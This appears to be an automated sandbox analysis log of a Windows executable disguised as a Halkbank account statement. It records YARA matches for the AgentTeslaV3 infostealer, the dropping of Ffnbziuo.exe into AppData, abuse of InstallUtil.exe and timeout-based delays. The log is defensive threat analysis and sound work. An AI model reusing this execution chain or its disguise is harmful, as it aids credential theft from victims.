Source: 15.0.InstallUtil.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Source: 15.0.InstallUtil.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Source: 15.2.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Source: 15.0.InstallUtil.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bDC304EBFu002d6459u002d468Au002d8955u002d4284386C0374u007d/u0039BF18FEFu002dDDA2u002d4C7Fu002d89B3u002d75DD1AC2253D.cs Large array initialization: .cctor: array initializer size 11689
Uses 32bit PE files
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: Halkbank_Ekstre_20220513_082357_541079.exe, type: SAMPLE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.0.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.419c788.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 18.0.Ffnbziuo.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.2.Ffnbziuo.exe.335c788.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.e00000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.Ffnbziuo.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.4174768.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 17.2.Ffnbziuo.exe.3334768.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 17.2.Ffnbziuo.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 17.2.Ffnbziuo.exe.33ac7a8.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 18.2.Ffnbziuo.exe.890000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Detected potential crypto function
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_017A4908 0_2_017A4908
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06330598 0_2_06330598
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06458D68 0_2_06458D68
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06455270 0_2_06455270
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06455A18 0_2_06455A18
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06456868 0_2_06456868
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06452020 0_2_06452020
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645B9C0 0_2_0645B9C0
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645B7F0 0_2_0645B7F0
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_0645B797 0_2_0645B797
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_064595C9 0_2_064595C9
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06452350 0_2_06452350
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06456B02 0_2_06456B02
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06453108 0_2_06453108
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Code function: 0_2_06330CB8 0_2_06330CB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0169F080 15_2_0169F080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0169F3C8 15_2_0169F3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633C740 15_2_0633C740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633EC50 15_2_0633EC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06338310 15_2_06338310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06337110 15_2_06337110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331662 15_2_06331662
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633166A 15_2_0633166A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633165E 15_2_0633165E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316B2 15_2_063316B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316B6 15_2_063316B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316BA 15_2_063316BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316BE 15_2_063316BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316A6 15_2_063316A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316AA 15_2_063316AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316AE 15_2_063316AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633169A 15_2_0633169A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633169E 15_2_0633169E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316F2 15_2_063316F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316F6 15_2_063316F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316FA 15_2_063316FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316FE 15_2_063316FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316E2 15_2_063316E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316E6 15_2_063316E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316EA 15_2_063316EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316EE 15_2_063316EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316D2 15_2_063316D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316D6 15_2_063316D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316DA 15_2_063316DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316DE 15_2_063316DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316C2 15_2_063316C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316C6 15_2_063316C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316CA 15_2_063316CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063316CE 15_2_063316CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331732 15_2_06331732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331736 15_2_06331736
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633173A 15_2_0633173A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331722 15_2_06331722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331726 15_2_06331726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633172A 15_2_0633172A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633172E 15_2_0633172E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331712 15_2_06331712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331716 15_2_06331716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633171A 15_2_0633171A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633171E 15_2_0633171E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331702 15_2_06331702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331706 15_2_06331706
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633170A 15_2_0633170A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_0633170E 15_2_0633170E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331742 15_2_06331742
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06331746 15_2_06331746
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06338260 15_2_06338260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06333330 15_2_06333330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06330040 15_2_06330040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_063399A8 15_2_063399A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A59230 15_2_06A59230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5661E 15_2_06A5661E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A54218 15_2_06A54218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5CC70 15_2_06A5CC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A535B0 15_2_06A535B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A58DF8 15_2_06A58DF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A509D8 15_2_06A509D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A59AD0 15_2_06A59AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5420A 15_2_06A5420A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A52A78 15_2_06A52A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A50888 15_2_06A50888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A591DA 15_2_06A591DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5AD37 15_2_06A5AD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 15_2_06A5B160 15_2_06A5B160
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_008248F8 17_2_008248F8
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_00824908 17_2_00824908
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05588D68 17_2_05588D68
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05583108 17_2_05583108
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_0558B9C0 17_2_0558B9C0
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05586868 17_2_05586868
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05582020 17_2_05582020
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05585270 17_2_05585270
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05585A18 17_2_05585A18
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05582350 17_2_05582350
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05586B02 17_2_05586B02
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_055B4300 17_2_055B4300
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 17_2_05460CB8 17_2_05460CB8
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_01204908 18_2_01204908
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF8D68 18_2_05DF8D68
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF6868 18_2_05DF6868
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF2020 18_2_05DF2020
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF5270 18_2_05DF5270
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF5A18 18_2_05DF5A18
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF3108 18_2_05DF3108
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF2350 18_2_05DF2350
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05DF6B0B 18_2_05DF6B0B
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05E240B0 18_2_05E240B0
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Code function: 18_2_05CD0CB8 18_2_05CD0CB8
Sample file is different than original file name gathered from version info
Source: Halkbank_Ekstre_20220513_082357_541079.exe Binary or memory string: OriginalFilename vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.400268491.00000000050E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameXbdqzwgvzotiiytiobf.dll" vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382604634.0000000008987000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382052349.000000000435A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.401221282.0000000006400000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382251635.00000000086BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: get_OriginalFilename vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXbdqzwgvzotiiytiobf.dll" vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000003.382007534.000000000432B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000000.261249129.0000000000E02000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIdksgm.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.402627186.0000000007F81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: get_OriginalFilename vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe, 00000000.00000002.411249230.0000000009043000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWukxFEBImOJXHePxokROUtHPQAqEHsoOn.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
Source: Halkbank_Ekstre_20220513_082357_541079.exe Binary or memory string: OriginalFilenameIdksgm.exe4 vs Halkbank_Ekstre_20220513_082357_541079.exe
PE file contains strange resources
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Ffnbziuo.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Halkbank_Ekstre_20220513_082357_541079.exe Virustotal: Detection: 34%
Source: Halkbank_Ekstre_20220513_082357_541079.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File read: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Jump to behavior
Source: Halkbank_Ekstre_20220513_082357_541079.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe "C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe"
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe "C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe "C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe"
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20 Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Zsjnsslxj\Ffnbziuo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File created: C:\Users\user\AppData\Roaming\Zsjnsslxj Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/4@7/4
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Halkbank_Ekstre_20220513_082357_541079.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
